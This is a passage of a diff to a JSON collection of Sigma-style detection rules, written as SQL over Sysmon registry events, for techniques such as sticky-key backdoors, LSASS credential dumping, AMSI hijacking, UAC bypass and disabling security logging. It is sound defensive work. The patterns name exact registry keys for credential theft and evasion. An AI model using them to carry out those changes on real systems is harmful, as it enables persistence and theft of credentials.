'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" ], - "filename": "registry_set_change_rdp_port.yml" + "filename": "registry_event_apt_leviathan.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits", - "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", + "title": "Sticky Key Like Backdoor Usage - Registry", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "status": "experimental", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S, frack113", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - 
"cve.2021.31979" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution 
Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "registry_event_stickykey_like_backdoor.yml" }, { - "title": "Potential AutoLogger Sessions Tampering", - "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", - "status": "experimental", - "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Camera and Microphone Access", + "id": "62120148-6b7a-42be-8b91-271c04e281a3", + "status": "test", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "author": "Den Iuzvyk", "tags": [ - "attack.defense_evasion" + "attack.collection", + "attack.t1125", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE 
'%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_autologger_sessions.yml" + "filename": "registry_event_susp_mic_cam_access.yml" }, { - "title": "Potential AMSI COM Server Hijacking", - "id": "160d2780-31f7-4922-8b3a-efce30e63e96", - "status": "experimental", - "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "RedMimicry Winnti Playbook Registry Manipulation", + "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" - ], - "filename": "registry_set_amsi_com_hijack.yml" - }, - { - "title": "Potential Persistence Via Excel Add-in - Registry", - "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", - "status": "experimental", - "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is 
started.", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE '/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" - ], - "filename": "registry_set_persistence_xll.yml" - }, - { - "title": "Tamper With Sophos AV Registry Keys", - "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "status": "experimental", - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" ], - "filename": "registry_set_sophos_av_tamper.yml" + "filename": "registry_event_redmimicry_winnti_reg.yml" }, { - "title": "Registry Persitence via Service in Safe Mode", - "id": 
"1547e27c-3974-43e2-a7d7-7f484fb928ec", + "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", + "id": "55e29995-75e7-451a-bef0-6225e2f13597", "status": "experimental", - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "author": "frack113", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" ], - "filename": "registry_set_add_load_service_in_safe_mode.yml" + "filename": "registry_event_silentprocessexit_lsass.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Registry", - "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "title": "Shell Open 
Registry Keys Manipulation", + "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" - ], - "filename": "registry_set_uac_bypass_wmp.yml" - }, - { - "title": "Disable Macro Runtime Scan Scope", - "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "status": "experimental", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" - ], - "filename": "registry_set_disable_macroruntimescanscope.yml" - }, - { - "title": "Set 
TimeProviders DllName", - "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", - "status": "experimental", - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" - ], - "filename": "registry_set_timeproviders_dllname.yml" - }, - { - "title": "New RUN Key Pointing to Suspicious Folder", - "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "status": "experimental", - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "falsepositives": [ - "Software using weird folders for updates" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details 
LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" - ], - "filename": "registry_set_susp_run_key_img_folder.yml" - }, - { - "title": "Change the Fax Dll", - "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", - "status": "experimental", - "description": "Detect possible persistence using Fax DLL load when service restart", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" - ], - "filename": "registry_set_fax_dll_persistance.yml" - }, - { - "title": "Change Winevt Event Access Permission Via Registry", - "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "status": "experimental", - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.t1548.002", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 
'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" ], - "filename": "registry_set_change_winevt_channelaccess.yml" + "filename": "registry_event_shell_open_keys_manipulation.yml" }, { - "title": "Suspicious Printer Driver Empty Manufacturer", - "id": "e0813366-0407-449a-9869-a2db1119dc41", + "title": "Esentutl Volume Shadow Copy Service Keys", + "id": "5aad0995-46ab-41bd-a9ff-724f41114971", "status": "test", - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" - ], - "falsepositives": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' 
AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" - ], - "filename": "registry_set_susp_printer_driver.yml" - }, - { - "title": "Registry Disable System Restore", - "id": "5de03871-5d46-4539-a82d-3aa992a69a83", - "status": "experimental", - "description": "Detects the modification of the registry to disable a system restore on the computer", - "author": "frack113", - "tags": [ - "attack.impact", - "attack.t1490" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" - ], - "filename": "registry_set_disable_system_restore.yml" - }, - { - "title": "Add Port Monitor Persistence in Registry", - "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", - "status": "experimental", - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1547.010" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" - ], - "filename": "registry_set_add_port_monitor.yml" - }, - { - "title": "Usage of Renamed Sysinternals Tools - RegistrySet", - "id": "8023f872-3f1d-4301-a384-801889917ab4", - "status": "experimental", - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT 
((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" - ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" - }, - { - "title": "Disable Sysmon Event Logging Via Registry", - "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "status": "experimental", - "description": "Detects changes in Sysmon driver altitude. 
If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "author": "B.Talebi", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate driver altitude change to hide sysmon" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" - ], - "filename": "registry_set_change_sysmon_driver_altitude.yml" - }, - { - "title": "Disabled RestrictedAdminMode For RDS", - "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1112" + "description": "Detects the volume shadow copy service initialization and processing via esentutl. 
Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" ], - "filename": "registry_set_lsa_disablerestrictedadmin.yml" + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" }, { - "title": "Suspicious Application Allowed Through Exploit Guard", - "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", - "status": "experimental", - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Narrator's Feedback-Hub Persistence", + "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "status": "test", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" + 